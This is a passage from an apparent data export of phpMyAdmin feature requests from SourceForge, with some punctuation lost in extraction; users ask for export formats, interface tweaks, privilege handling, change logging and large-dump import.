After about 2 hours of pulling my hair out over this, I finally came to the realization that there was an extra space after a function call ...WHERE ACOS ... should have been ...WHERE ACOS ... PHP does not strip that whitespace away, so the query came up bust; phpmyadmin does or ignores it), so the query worked when I ran it there.
Perhaps phpmyadmin should have a setting to display a warning when it modifies an sql query even if it s just stripping away one character of whitespace, since apparently that s enough to kill the entire query in PHP.
Original URL https sourceforge.net p phpmyadmin feature requests 680 https sourceforge.net p phpmyadmin feature requests 680 Original author tmb8782","enhancement"
"24444","5380","MySQL dump.
Hi all.
It would be nice to implement big MySQL dumps backup restore) with phpMyAdmin.
It is possible to do this in script!
Why phpMyAdmin can t do this?
You must simply call the script itself with a parameter if you prevent the php execution timeout.
Hope that this is implemented in one of the next versions.
phpMyAdmin is a nice tool!
thanks BugKiller Original URL https sourceforge.net p phpmyadmin feature requests 681 https sourceforge.net p phpmyadmin feature requests 681 Original author bugkiller","enhancement"
"24444","5381","User specific Database Bookmarks.
Hello, we re using phpMyAdmin in our company on a central database server.
However, the amount of databases exceeds more than 200, and it s a waste of time to pick the right one.
It would be nice if the database dropdown could be customized that it only shows the most recently used databases on top, or that a user can bookmark his often used databases.
Thanks Timo Original URL https sourceforge.net p phpmyadmin feature requests 682 https sourceforge.net p phpmyadmin feature requests 682 Original author timo h","enhancement"
"24444","5382","Only table names in scratchboard.
I would like to have an option include field names that can be set on or off, affecting the scratchboard.
If it is set, the behaviour is the same as the current behaviour.
If it is not set, only the table names are showing in the scratchboard and no field names).
This makes it easier for complex databases to be properly layed out.
Now I find that a long table is being displayed over another table that is positioned below it at a higer Y value) in the scratchboard preview, the PDF output is correct, there is no overlap hiding of tables.
If someone could point me in the right direction the generation of the draggable tables in the javascript scratchboard) then maybe I can make a patch myself en post it here for possible inclusion in the next release.
Original URL https sourceforge.net p phpmyadmin feature requests 683 https sourceforge.net p phpmyadmin feature requests 683 Original author remcoa","enhancement"
"24444","5383","Reset AutoIndex Button Link.
Allow the user to reset the AutoIndex if and only when the table is empty.
Make the Next Autoindex in Row Statistics a link so when you click it a javascript alert pops up making sure that you want to reset the autoIndex Original URL https sourceforge.net p phpmyadmin feature requests 684 https sourceforge.net p phpmyadmin feature requests 684 Original author ogar572","enhancement"
"24444","5384","GIS.
I would like to see support for the openGIS features added in 4.1 I used phpmyadmin extensively in teaching MySQL, and I think it is important for today s IS graduates to be familiar with geospatial concepts.
Original URL https sourceforge.net p phpmyadmin feature requests 687 https sourceforge.net p phpmyadmin feature requests 687 Original author rtw30606","enhancement"
"24444","5385","Editor for HTML content.
It could be better to have WYSIWYG editor is available for TXT and LONGTXT field types.
This could be very beneficial to allow clients to edit their web page content if the content has HTML codes.
Best Regards, CemK Original URL https sourceforge.net p phpmyadmin feature requests 685 https sourceforge.net p phpmyadmin feature requests 685 Original author ck74","enhancement"
"24444","5386","db print view has no table border.
Can the table style for the db print view be changed to that of the table print view?
Currently the table border doesn t show up when you print from the db print view.
Original URL https sourceforge.net p phpmyadmin feature requests 686 https sourceforge.net p phpmyadmin feature requests 686 Original author deer421","enhancement"
"24444","5387","Option to make Edit SQL textarea larger.
When editing large SQL statements in the edit popup, it is hard to maintain overview.
It would be nice to have a switch or button to make the window and textarea much larger.
Thanks for a great product, by the way!
Original URL https sourceforge.net p phpmyadmin feature requests 688 https sourceforge.net p phpmyadmin feature requests 688 Original author martinseebach","enhancement"
"24444","5388","Column privileges and update.
Error SQL query UPDATE `inventoidut rakennukset mysql` SET `Osoite` = NULL , `Kuvaus` = lt;test gt; , `Asemakaava vahv` = NULL , `Asemak kayttotark` = NULL , `Suoj maarays selitys` = NULL WHERE `ID` =295 LIMIT 1 MySQL said 1143 update command denied to user asentaja localhost for column Osoite in table inventoidut rakennukset mysql I have set in column privileges to allow user to update only Kuvaus column and as you can see that is what he tries lt;test gt;).
But somehow phpmyadmin is updating also extra columns?
Original URL https sourceforge.net p phpmyadmin feature requests 689 https sourceforge.net p phpmyadmin feature requests 689 Original author ttlaiho","enhancement"
"24444","5389","MySQL 4 3.23 compatible export.
phpMyAdmin Version 2.6.0 rc1 I found no way or comment how to export data from a mysql 4.1 database for use with a mysql 3.23 or 4.0 database.
It s nor problem with mysqldump option compatible=mysql323 or compatible=mysql40 Maybe it s a good feature in further phpMyAdmin versions to make it possible to export data for use with older MySQL versions.
Greets, OS Original URL https sourceforge.net p phpmyadmin feature requests 690 https sourceforge.net p phpmyadmin feature requests 690 Original author browsertec","enhancement"
"24444","5390","Please add a comment to the databases.
I am using this great tool at my internet server.
The problem is, that all databases are created by the internet provider.
This means, the names of the databases are db123456, db123457, db3245675 and so on only a autoincrement number).
Because this is the server of an internet provider and not my own, i can t change the names.
So on the dropdown List of the phpmyadmin database selection i fount the names !
!
y !
!
db1234567 !
!
db1234568 !
!
db... !
and it is very hard to find the needed database in this list.
If there is a possibility to add a comment to each database it is very easy to find the database !
!
y !
!
db1234567 customer schmidt) !
!
db1234568 internal use) !
!
db... test db) !
can you please add such a comment thanks Oliver Original URL https sourceforge.net p phpmyadmin feature requests 691 https sourceforge.net p phpmyadmin feature requests 691 Original author vogelor","enhancement"
"24444","5391","Create a manipulation log.
When I m developing stuff here on our local servers and change the database layout, insert stuff and create Indexes I always have to keep track of this manually, to apply these changes to the live database afterwards.
Would be great to have a log where all these things for the active database could be recorded, only manipulating queries.
I could remove unwanted lines afterwards and would have a sql update script that contains everything I need for the live update.
Original URL https sourceforge.net p phpmyadmin feature requests 692 https sourceforge.net p phpmyadmin feature requests 692 Original author temporary","enhancement"
"24444","5392","make import options configurable.
I noticed that in ldi table [using 2.6.0 pl3] that the options for accepting the format of a file to be uploaded are hard coded.
Eg on line 108, the input name field terminator has a value of ; .
It might be a good idea to have a configuration feature where one can define field termintor, fields enclosed by, fields escaped by, lines terminated by and the LOAD method.
This would mimick the behavor of the export feature, which has these fields defined in the config.inc.php.
Since I often import and export CSV files, I ve changed the defaults in my config so that the export always defaults to a , instead of the ; .
Having that same ability for importing would be a Good Thing. )
In the meantime, I ve edited ldi table to meet my needs.
Thanks for considering this... vjl Original URL https sourceforge.net p phpmyadmin feature requests 693 https sourceforge.net p phpmyadmin feature requests 693 Original author vjl323","enhancement"
"24444","5393","Microsoft SQL support.
I along with many other developers I know need phpMyAdmin support of Microsoft SQL Databases.
Original URL https sourceforge.net p phpmyadmin feature requests 694 https sourceforge.net p phpmyadmin feature requests 694 Original author deadshot270","enhancement"
"24444","5394","PDF export.
It would be great if data could also be exported in the PDF format.
Original URL https sourceforge.net p phpmyadmin feature requests 695 https sourceforge.net p phpmyadmin feature requests 695 Original author pierre42","enhancement"
"24444","5395","Add character set env.
overview to Charsets tab.
I have two issues, which possibly could lead a bug report.
1) If I enable cookie authentication type, I am presented with the login screen, where I can choose the language.
There are two types of encoding almost for all languages at this screen UTF 8 and ISO more for Cyrillic, etc).
Once I login I use MySQL 4.1.x), PMA switches to UTF 8 encoding for its output and UTF 8 encodings are the only choice I have on the title page).
Is this intended?
Why the lists of possible encodings are different before and after login?
2) My MySQL server has the following default settings using SHOW VARIABLES) character set database latin1 character set server latin1 collation database latin1 german2 ci collation server latin1 german2 ci If my `character set server` is latin1, why on the title page PMA shows the following info directly under the change language dropdown list)?
MySQL charset UTF 8 Unicode utf8).
Original URL https sourceforge.net p phpmyadmin feature requests 696 https sourceforge.net p phpmyadmin feature requests 696 Original author unclef","enhancement"
"24444","5396","Remember settings in export options.
Hello, I think that phpMyAdmin should remember export options settings.
Most users, including me, are using same or similar options most of the time, so they could be stored in cookie, don t you think so?
Robo.cz Original URL https sourceforge.net p phpmyadmin feature requests 697 https sourceforge.net p phpmyadmin feature requests 697 Original author robo cz","enhancement"
"24444","5397","Microsoft Excel Word export.
It is possible to do Excel export just by creating XML file.
I just noticed this when installing Mantis bug tracker http mantisbt.org ).
It would be nice to support this same can be done for Microsoft Word).
Original URL https sourceforge.net p phpmyadmin feature requests 698 https sourceforge.net p phpmyadmin feature requests 698 Original author nijel","enhancement"
"24444","5398","Deleting Foreign Keys.
I m running 2.6.0 pl2 I deleted a row containing a phpMyAdmin foreign key.
I noticed the other tables containing columns related to said foreign key remained unaffected.
There existed rows with dependent field values that had become invalid.
It would be very useful if the orphaned rows were deleted along with their parent row with an appropriate warning) or at least if there was a phpMyAdmin to isolate and remove normalize?)
this data.
Original URL https sourceforge.net p phpmyadmin feature requests 699 https sourceforge.net p phpmyadmin feature requests 699 Original author mankyd","enhancement"
"24444","5399","TIMESTAMP NEW ).
When a data with TIMESTAMP field available is edited, it sets first TIMESTAMP field value to NOW ) automatically, in EDIT page.
This is really annoying, please remove that auto NEW ) feature.
Thanks...
Original URL https sourceforge.net p phpmyadmin feature requests 700 https sourceforge.net p phpmyadmin feature requests 700 Original author shehi","enhancement"
"24444","5400","Print view using css.
Print view fails when using multiple commands and variables.
Take the following example query set a = 0; select a = a 1 as RowNum, username from user when run from the sql tab I receive the expected results such as RowNum username 1, frank 2, tom 3, jerry However, when I click on Print View, Print View with full texts), or Export the data I get is RowNum username Null, frank Null, tom Null, jerry It appears that phpMyAdmin is only passing the last part of the query from the select statement forward) to the sql.php file Chris.
Original URL https sourceforge.net p phpmyadmin feature requests 701 https sourceforge.net p phpmyadmin feature requests 701 Original author clively","enhancement"
"24444","5401","icon.
phpMyAdmin is almost perfect.
All it needs is a lt;link rel= icon href= share pictures iosico.png gt; to get a specific icon beside the URL in most decent browsers.
Original URL https sourceforge.net p phpmyadmin feature requests 702 https sourceforge.net p phpmyadmin feature requests 702 Original author germ 245","enhancement"
"24444","5402","Database grouping.
Hello.
May you make an option to make groups and assign to databases ?
After that databases in database list may be shown by groups.
This is need for server with many databases Original URL https sourceforge.net p phpmyadmin feature requests 703 https sourceforge.net p phpmyadmin feature requests 703 Original author chts","enhancement"
"24444","5403","Order by DESC.
When you browse results, it would be very handful if you have 2 links for sorting order ASC and DESC.
I personally sort much more times in DESC order, so I must reload the page 2 times or open the sql window to add the sorting order manually.
Thank you.
Original URL https sourceforge.net p phpmyadmin feature requests 704 https sourceforge.net p phpmyadmin feature requests 704 Original author asteddy","enhancement"
"24444","5404","Navigation path.
It would be very useful if there would be navigation path.
For example, when you modify priviledges, you navigate through various pages; if you want to add priviledges to a second database for the same user, you must actually go to home and renavigate again restarting with priviledges= gt;select user= gt;select database= gt;select priviledges= gt;confirm.
If you have all the navigation path above, you can immediatly go back to select a new database for the same user.
The same thing can be done for all pages of phpmyadmin.
Original URL https sourceforge.net p phpmyadmin feature requests 705 https sourceforge.net p phpmyadmin feature requests 705 Original author asteddy","enhancement"
"24444","5405","Multi db privileges adding.
When you add priviledges for a user, you can actually select one database; it would be useful if you can select more than one database and then give them all the same priviledges.
It can be done the same way as adding fields to a database.
When you add fields you have the possibility to add more fields before confirm the ones you re working on.
Add 1 field s) go The same way you can have Add 1 database s) go Original URL https sourceforge.net p phpmyadmin feature requests 706 https sourceforge.net p phpmyadmin feature requests 706 Original author asteddy","enhancement"
"24444","5406","structure compares and auto alignment.
often I need to compare the database structure on which I m working with database structure of other version of the software I m developping, already installed to my clients.
So it would be very useful to tell phpmyadmin to compare the structure of db A on server A to the db B on server B, anche obtain the differences in structure, or in data, and if needed, auto adjust the structure or data of the 2 database to get them the same.
Ciao!
Original URL https sourceforge.net p phpmyadmin feature requests 707 https sourceforge.net p phpmyadmin feature requests 707 Original author wakan","enhancement"
"24444","5407","Replication status.
Is there a possiblity to view the status of replication in master and slave database.
I could not find in FAQ or in any of the forum.
Original URL https sourceforge.net p phpmyadmin feature requests 708 https sourceforge.net p phpmyadmin feature requests 708 Original author tvkbhaskar","enhancement"
"24444","5408","Link that can be clicked to replicate window.
A link that can be used for Open Link in New Window Tab) , that starts a fresh instance including the frameset.
If mean what you get if you opened a new tab window and used a the bookmark to start a session , only that you could do it in one step.
Preferably in text so that the Find As You Type feature of Mozilla Firefox isn t impeded.
Original URL https sourceforge.net p phpmyadmin feature requests 709 https sourceforge.net p phpmyadmin feature requests 709 Original author citd","enhancement"
"24444","5409","Column numbering for fields....
In databse structure view it would be great if left hand the column numbers can be shown for each field.
This helps in larger tables while programming with php.
before field1 type attribute field2 type attribute field3 type attribute after 0 field1 type attribute 1 field2 type attribute 2 field3 type attribute etc.
Original URL https sourceforge.net p phpmyadmin feature requests 710 https sourceforge.net p phpmyadmin feature requests 710 Original author petesky","enhancement"
"24444","5410","Clear Button for SQL Query Textarea.
A Button Link that clears the content of the SQL Query Textarea.
I pasted this link into my local phpMyAdmin lt;a href= onclick= document.sqlform.sql query.value= ;return false; gt;Clear Textarea lt; a gt; Original URL https sourceforge.net p phpmyadmin feature requests 711 https sourceforge.net p phpmyadmin feature requests 711 Original author citd","enhancement"
"24444","5411","Use select instead of radios on editing.
hi, can You change radio s) after edit row form goto action options) onto select options ... this can save `place` on page ... and sometimes will be no needed scroll the page ... ) thanx.
jenik.
Original URL https sourceforge.net p phpmyadmin feature requests 712 https sourceforge.net p phpmyadmin feature requests 712 Original author jenix","enhancement"
"24444","5412","Wastebin for tables.
I am after a feature that I could enable on PHPMyAdmin when enabled, would mean that a dropped table or dropped database isn t actually dropped by means of a administrator only setting on the software.
What I envisage would happen is that someone accidentally deletes an important table or when someoone from outside does a DoS attack on someone s database and does Drop Database.
Instead of the database disappearing into a black hole, it actually gets moved to a hidden special database which the administrator of the PHPMyAdmin can specify in the settings for this function) and an alert is emailed to the administrator stating the name of the table or database just dropped, the time and date it happened, and details of who was logged in at the time it happened.
In case of DoS or similar it would track the originating IP address if possible) and then report that to the administrator.
This is a feature I need for my work so it is a pretty urgent feature wanted, and I am sure that it could be useful for the overall way that PHPMyAdmin works.
Thanks for listening, Nathalie Original URL https sourceforge.net p phpmyadmin feature requests 713 https sourceforge.net p phpmyadmin feature requests 713 Original author nmforste","enhancement"
"24444","5413","Import Export Plugins.
It would be nice if developers could write their own export import plugins and drop them into a folder like libraries export and have them automatically shown in the export page.
This would help those who have to use another format not currently provided.
Original URL https sourceforge.net p phpmyadmin feature requests 714 https sourceforge.net p phpmyadmin feature requests 714 Original author vestige","enhancement"
"24444","5414","bool type.
Can we please have a BOOL stype in the table creator page.
MySQL will automatically convert this to a TINYINT 1).
Thanks, Shaun Original URL https sourceforge.net p phpmyadmin feature requests 715 https sourceforge.net p phpmyadmin feature requests 715 Original author shaunmoss","enhancement"
"24444","5415","Limit length for username in privileges.
Since a MySQL username is limited to 16 characters in length, it would be useful if the username fields in the privilege forms had a length attribute that limited the input to 16 characters as well.
This would prevent the dreaded Error 1145 The host or user argument to GRANT is too long.
Also, there should be a link to Add a new privilege on the initial privilege page that shows the list of links A Z so that you don t have to first click on a link and then scroll to the Add link at the bottom.
Regards, Chris Bloom Original URL https sourceforge.net p phpmyadmin feature requests 716 https sourceforge.net p phpmyadmin feature requests 716 Original author xangelusx","enhancement"
"24444","5416","Ability to sort Table view columns.
When viewing the tables of a database db details structure.php) we should be able to sort the columns there, such as Records, Size, and Overhead.
It would be very useful in quickly finding the table s) that are the largest in the database, so we can remove some excess records.
Original URL https sourceforge.net p phpmyadmin feature requests 717 https sourceforge.net p phpmyadmin feature requests 717 Original author garywk","enhancement"
"24444","5417","Order themes in theme manager.
Display themes in dropdown menu alphebetically Original URL https sourceforge.net p phpmyadmin feature requests 718 https sourceforge.net p phpmyadmin feature requests 718 Original author mj1","enhancement"
"24444","5418","more details in PDF relation view.
I like the relation view generation of phpmyadmin for relational databases.
It would be nice if fieldproperties like ON DELETE CASCADE , ON UPDATE CASCADE etc .
could be made visible in the PDF relation view.
by text, icons or colors) Original URL https sourceforge.net p phpmyadmin feature requests 719 https sourceforge.net p phpmyadmin feature requests 719 Original author peterdd","enhancement"
"24444","5419","SWF for relation view.
I would like suggest to develope a plugin for phpmyadmin for relational databases like the PDF generation plugin.
possible advantages over PDF plugin WYSIWYG, automatic drawing of relation lines while layouting the tables.
Scalable interactive e.g.
show table or field comments or content on mouseover etc.)
expand, collapse table details There are more than one way to reach the aim A.
Make a prebuild SWF for phpmyadmin that loads a XML file which is send by phpmyadmin.
The XML contains all informations about tablefields,and relations, and the last layoutpositions of your tables.
like the pdfconfig has) Some little ActionScript parse the XML, at first open layout the table and connect the relation fields by lines using a sweet layout routing algorithm give possibility to customize by drag drop the lines by user) Let the user drag drop the tables.
Lines are repainted automatically following the tables when dragged.
Save your changes for the next time you open the swf generation config.
Because the Data is separated from Layoutview, the SWF is even themeable.
This variant requires Flash gt;= 5, but the phpmyadminuser need no flashgeneration library at all.
B.
Do all the magic in PHP whateverlanguage and generate the SWF complete on server using an swfgeneration library ming or some other) Even Flash4 would be sufficient for this variant, but requires the minglibrary in PHP.
C. Like A, but using GET POSTvariables.
But XML is better and easier to handle in Flash.
peterdd Original URL https sourceforge.net p phpmyadmin feature requests 720 https sourceforge.net p phpmyadmin feature requests 720 Original author peterdd","enhancement"
"24444","5420","Refresh icon for left frame.
I use phpMyAdmin A LOT.
Really nice.
One small thing i think) is a refresh icon to the left, that would refresh reload the list of databases and tables.
Everytime I have to refresh, I have to go to another database and back again.
It is not a fault in phpMyAdmin because I have a script that adds tables in the background and they are not visible on the list.
So a refresh icon would be REALLY nice!!!!
CoRex Original URL https sourceforge.net p phpmyadmin feature requests 721 https sourceforge.net p phpmyadmin feature requests 721 Original author corexsf","enhancement"
"24444","5421","Editing a system table.
phpMyAdmin does not have support for editing system tables Tables with only 1 row).
The only way to edit it now is to check the row, and click the edit button after With selected and it ll use a big unnecessary WHERE when updating).
Original URL https sourceforge.net p phpmyadmin feature requests 722 https sourceforge.net p phpmyadmin feature requests 722 Original author andreasblixt","enhancement"
"24444","5422","Provide sanity check for table column names.
At this moment, I believe there are no proper sanity checks for the creation of table and or column names.
A space character in a column name e.g.
`test `) is simply overlooked, and it does not appear on screen.
Column names like `order` without the backtick quotes are invalid.
Please provide a proper warning when creating table names that might cause problems, especially with the whitespace problem!
Whitespace may be copy pasted from another application and should be trimmed in almost every case.
Only in case of a plain stupid developer this might come in handy.
Tables named ` ` space) are not recommended ;) Original URL https sourceforge.net p phpmyadmin feature requests 723 https sourceforge.net p phpmyadmin feature requests 723 Original author cheatah","enhancement"
"24444","5423","Characterset switching when viewing editing.
Nowadays best standard charset for international usage is UTF 8.
But then the special characters don t mean anything to us anymore.
So, it would be great if phpmyadmin would have the option to choose your own view character set.
similar like the option Notepad has.
So view as UTF 8 default) or ANSI Now phpmyadmin forces this in html headers.
For table data input fields I would like to have the same option.
So enter the data in e.g.
ANSI or latin1, but store in the database fields using the collation setting.
For example we enter in Ansi Santxc3xa9 xc3x84nderung Then the database would contain Sant amp; 38980;nderung Original URL https sourceforge.net p phpmyadmin feature requests 724 https sourceforge.net p phpmyadmin feature requests 724 Original author achebo12","enhancement"
"24444","5424","compress function for insert edit a binary field.
When I upload a file to binary field, can I select option compress .
Thanks!
Original URL https sourceforge.net p phpmyadmin feature requests 725 https sourceforge.net p phpmyadmin feature requests 725 Original author obiserver","enhancement"
"24444","5425","Batch changing the collation of each column in a table.
It would be useful, during the transition time from older MySQL versions to the most recent, that phpMyAdmin would have a batch change feature for the collations of each column in a table.
In a large tables with tens of text fields, it would be easy to just check a checkbox Change all column collations when changing the default collation for the whole table.
Original URL https sourceforge.net p phpmyadmin feature requests 726 https sourceforge.net p phpmyadmin feature requests 726 Original author villemattila","enhancement"
"24444","5426","Database dump and restore from the server.
The ability to dump and restore the database to and from a file residing on the server itself, as opposed to having to upload the database backup through a webform.
Original URL https sourceforge.net p phpmyadmin feature requests 727 https sourceforge.net p phpmyadmin feature requests 727 Original author grega5","enhancement"
"24444","5427","password generator in server privileges.
Javascript) Password generator for server privileges.php?adduser=1 gt; useful when you have to create 30 accounts... ) Original URL https sourceforge.net p phpmyadmin feature requests 728 https sourceforge.net p phpmyadmin feature requests 728 Original author swix","enhancement"
"24444","5428","Export to oasis.
hi now there are a open source file format oasis), some office software will use it koffice, openoffice) that could be very important for phpadmin to support this file format thanks Original URL https sourceforge.net p phpmyadmin feature requests 729 https sourceforge.net p phpmyadmin feature requests 729 Original author os2be","enhancement"
"24444","5429","table relation drawing in HTML.
I have wrote the script that can draw relations of one table to other related tables by generation HTML code.
I think this could be usefull for phpMyAdmin project see the attached file).
Let me know if you interested.
P.S.
sorry for my English.
Original URL https sourceforge.net p phpmyadmin feature requests 730 https sourceforge.net p phpmyadmin feature requests 730 Original author speranskiy","enhancement"
"24444","5430","User Database creation.
Will be very usuful create a choice to create user database at the same time, like the option to delete de user database with the same name.
Original URL https sourceforge.net p phpmyadmin feature requests 734 https sourceforge.net p phpmyadmin feature requests 734 Original author ademirk","enhancement"
"24444","5431","Sequential Editor.
This should be the easiest thing to add on, if you think about it.
When someone presses go in a record window, it moves on to the next exisitng record to edit, depending upon the the primary key, instead of going back to the previous browse window..
I talked this over with Marc.
He thought it would be a very popular feature, once installed.
I m not a coder, but don t want to be a free rider and pop in where I can to suggest something new or sth that need fixing.
That is what Open Source is about we contribute what we can, as long as we contribute`!
Original URL https sourceforge.net p phpmyadmin feature requests 731 https sourceforge.net p phpmyadmin feature requests 731 Original author jtjohnston","enhancement"
"24444","5432","Using input could corrupt data in varchar.
PROBLEM newlines in strings and all following signs will be removed from varchar fields if edited in phpmyadmin.
LOOK AT THIS CASE On my website I offer a textarea element to create data for a varchar field in my mysql database because I want the user to be able to use newlines despite the varcharxc2xb4s shortness up to 255 signs.
These newlines are stored in the database correctly.
And if I open the record on my website again it appers correctly in the textarea.
But if I open the record to edit it in phpmyadmin this varchar field is shown in an input element wich has only one line!
I can only see the first line of my data.
In the value attribute of phpmyadminxc2xb4s text element these newlines are transmitted as 0D 0A but they are not displayed in the element.
If I submit the phpmyadmin form the data of this field is corrupted, because the other lines are removed.
I think this is very importand because everyone considers data not to be damaged if just opened and closed in phpmyadminxc2xb4s editor.
SOLUTION Content of varchar field must be displayed in small textareas if it includes newlines.
EXTENDED IDEA If no data or one line data) is shown the user could be able to select whether he wants to see an input text or an textarea perhaps with a small button to switch between these options.
Original URL https sourceforge.net p phpmyadmin feature requests 735 https sourceforge.net p phpmyadmin feature requests 735 Original author jehoho","enhancement"
"24444","5433","Improve popup window titles query window, theme selector).
The title of the query window is always phpMyAdmin .
The title of the theme selection popup window is phpMyAdmin 2.6.3 dev .
It would be nice if this could be standardized.
It would be very nice if both of these windows could work like the main window with regard to cfg[ ShowHttpHostTitle ] and cfg[ SetHttpHostTitle ].
In the course of implementing this request, the following can also be addressed There seems to be a lot of duplicated code between themes.php and header meta style.inc.php.
I m thinking themes.php should probably be able to use header meta style.inc.php.
I m thinking probably header meta style.inc.php s title tag can be augmented with cfg[ SetHttpHostTitle ] and that would then take care of it.
Original URL https sourceforge.net p phpmyadmin feature requests 732 https sourceforge.net p phpmyadmin feature requests 732 Original author ryandesign","enhancement"
"24444","5434","logging function for changes in rows and maybe more).
i m a programmer for a browsergame with php mysql.
because i gave access to mysql through phpmyadmin to some guys i wanted to log all changes they do in rows.
since there is no such feature in phpmyadmin i wanted to ask if that could be implemented in future versions.
for now, because i really need this, i just changed it like this it s still the version 2.5.4) tbl replace.php, line 176 sql query = query .
; ; local query = SELECT VERSION ) as version, USER ) as user ; res = PMA mysql query local query) or PMA mysqlDie , local query, FALSE, ); mysql cur user and host = PMA mysql result res, 0, user ); mysql cur user = substr mysql cur user and host, 0, strrpos mysql cur user and host, )); datei = fopen changes.log , a ); fwrite datei, date d m Y H i ).
.
mysql cur user.
.
sql query.
\n ); fclose datei); result = PMA mysql query query); it s just done quickly, some copy paste from main.php for getting the username which is logged in) and writing in a file as you actually can see yourself ;).
it would be nice to have a possibility to log changes which are done my version just logs changes in rows since i only need this and not more) directly by enabling it in the conf file.
probably there are other users who need that feature too.
Original URL https sourceforge.net p phpmyadmin feature requests 733 https sourceforge.net p phpmyadmin feature requests 733 Original author scibot","enhancement"
"24444","5435","Undo Queries.
A feature to allow undoable queries.
For example you update a row in a table phpmyadmin gets the current values, saves them, then does the UPDATE.
Then you can undo the query if necessary.
Original URL https sourceforge.net p phpmyadmin feature requests 738 https sourceforge.net p phpmyadmin feature requests 738 Original author davecaunt","enhancement"
"24444","5436","Interface to create and manupulate Views stored procedures.
Please provide an interface to create and manupulate Views stored procedures.
This is a very useful feature if you provide it.
Original URL https sourceforge.net p phpmyadmin feature requests 739 https sourceforge.net p phpmyadmin feature requests 739 Original author mathewparet","enhancement"
"24444","5437","support SELECT ... FROM dual.
This is standard ANSI syntax and is supported since MySQL 4.1.0.
Original URL https sourceforge.net p phpmyadmin feature requests 736 https sourceforge.net p phpmyadmin feature requests 736 Original author lem9","enhancement"
"24444","5438","Pages for table list.
I run a number of sites which use massive numbers of tables One has over 250,000).
phpMyAdmin cant display all this information at once The browser crashes).
It shouldnt be too hard to put pages on the table list just as you do with the SQL query results.
1,000 tables per page by default would mean that the people who dont need the feature dont even notice it and the people who need it can have fast loading pages.
Original URL https sourceforge.net p phpmyadmin feature requests 737 https sourceforge.net p phpmyadmin feature requests 737 Original author cheater512","enhancement"
"24444","5439","Configurable default export filename templates.
add params to set default filename templates for data export in config.inc.php Original URL https sourceforge.net p phpmyadmin feature requests 740 https sourceforge.net p phpmyadmin feature requests 740 Original author proxy99","enhancement"
"24444","5440","Export Data to Insert without Primary Key.
I ran across a situation where I needed to export a table in SQL and add it into another database with the same table structure but I wanted to add these elements onto the end of the the table elements.
The problem was that the export also put in the primary keys into the insert statements and that made me have to write a quick script to export this data without the primary key in the insert and do this for myself.
This would be a great addition to the export.
Note I would write this myself for you guys, but I am at work and my management do not want me to write open source code on the job.
If I get a chance this week in some spare time I will put together a patch, but no guarantees.
Original URL https sourceforge.net p phpmyadmin feature requests 742 https sourceforge.net p phpmyadmin feature requests 742 Original author sayle m","enhancement"
"24444","5441","Browse in cfg[ DefaultTabDatabase ].
Marc, We discussed this offline once.
Would you consider adding the browse tab to cfg[ DefaultTabDatabase ] ?
You have not, because it is not a single .php file?
http www.foo.com mysql sql.php?lang=en iso 8859 1 server=1 db=glquebec org main table=GLQ goto=tbl properties structure.php back=tbl properties structure.php sql query=SELECT 2A FROM 60GLQ 60 pos=0 Original URL https sourceforge.net p phpmyadmin feature requests 741 https sourceforge.net p phpmyadmin feature requests 741 Original author jtjohnston","enhancement"
"24444","5442","Customize themes per server.
After having accidentally made a big mistake on my production server, thinking I was looking at my development server, I think it would be a great boon to select different themes for different servers.
For my own immediate needs, in select theme.lib.php I ve replaced pmaTheme= COOKIE[ pma theme ]; with if server == 2) pmaTheme = darkblue orange ; else pmaTheme = original ; Original URL https sourceforge.net p phpmyadmin feature requests 743 https sourceforge.net p phpmyadmin feature requests 743 Original author mikeryan","enhancement"
"24444","5443","save Full Texts status in bookmark.
If i bookmark a query it would be great to select if a want Full Texts displayed or not.
Original URL https sourceforge.net p phpmyadmin feature requests 744 https sourceforge.net p phpmyadmin feature requests 744 Original author em gotcha","enhancement"
"24444","5444","Types <select>) in alphabetical order.
When creating a new table or adding a new row, the type selection is ordered in a strange way that I still don t understand VARCHAR TINYINT TEXT DATE SMALLINT MEDIUMINT INT BIGINT FLOAT DOUBLE DECIMAL DATETIME TIMESTAMP TIME YEAR CHAR TINYBLOB TINYTEXT BLOB MEDIUMBLOB MEDIUMTEXT LONGBLOB LONGTEXT ENUM SET BINARY VARBINARY If there is an order, then my request is useless but please tell me what it is) I ordered it for you, so that you ll just have to add it to the code BIGINT BINARY BLOB CHAR DATE DATETIME DECIMAL DOUBLE ENUM FLOAT INT LONGBLOB LONGTEXT MEDIUMBLOB MEDIUMINT MEDIUMTEXT SET SMALLINT TEXT TIME TIMESTAMP TINYBLOB TINYINT TINYTEXT VARBINARY VARCHAR YEAR Original URL https sourceforge.net p phpmyadmin feature requests 745 https sourceforge.net p phpmyadmin feature requests 745 Original author mrcreak","enhancement"
"24444","5445","Add DROP TABLE to database copy.
Hi, One of our programmers has asked if this feature might be able to be implemented.
When he does a database copy he would like the ability to be able to drop the target table if it already exists.
I m going to post what he has sent to me.
Begin Email Add DROP TABLE to database copy 1\.
Select a database 2\.
Operations 3\.
Copy database to...
When copying a single table you get the option to add DROP TABLE End Email Thanks very Much.
Craig Original URL https sourceforge.net p phpmyadmin feature requests 746 https sourceforge.net p phpmyadmin feature requests 746 Original author craigles","enhancement"
"24444","5446","filter tables.
Hi!
I am working on some databases with a large amount of tables; many of them are temporary not real temporary tables, but they have only a limited lifetime) which is obvious from their names, like TEMPXXXX.
It would be very handy if we could configure table name filters on per server basis.
Any table name matching that filter would not be displayed.
I think about having something like cfg[ Servers ][ i][ extension ][ filter ] = array ) in the config file, the array containing PCREs; if any of them matches a table name this is not displayed in the table name list left center frame) If there is interest in such a feature I think I could implement it; we will need this feature anyway, but having it in phpMyAdmin would make updates a lot easier ;) regards daniel Original URL https sourceforge.net p phpmyadmin feature requests 747 https sourceforge.net p phpmyadmin feature requests 747 Original author marvin4two","enhancement"
"24444","5447","With Selected Copy.
can you add a feature that will duplicate rows or make copies of a row?
with selected make XXX copies.
copy whole row except primary key.
or insert new row with default values the same as row XXX.
Original URL https sourceforge.net p phpmyadmin feature requests 748 https sourceforge.net p phpmyadmin feature requests 748 Original author yqbd","enhancement"
"24444","5448","Import local sql dump.
Currently the only method of importing a database dump is by selecting the file on the clients computer for upload, or manual query in the box provided.
The biggest disadvantage with this is, if you have a large file, let s say 20MB, it s incredibly difficult to import that file into MySQL.
The only option I can think of, if you re bright, is importing it using ssh on a linux server, which many people may not know how to do this.
What I would like to see is a thrid option.
An option where the client can upload the sql dump via ftp and choose a server path to the file in phpmyadmin and import it, regardless of size.
This would eliminate the need to upload the file, as it would already be present on the server.
And ofcource, depending on size, the file could be broken up by phpmyadmin and executed in cycles.
This would be VERY useful.
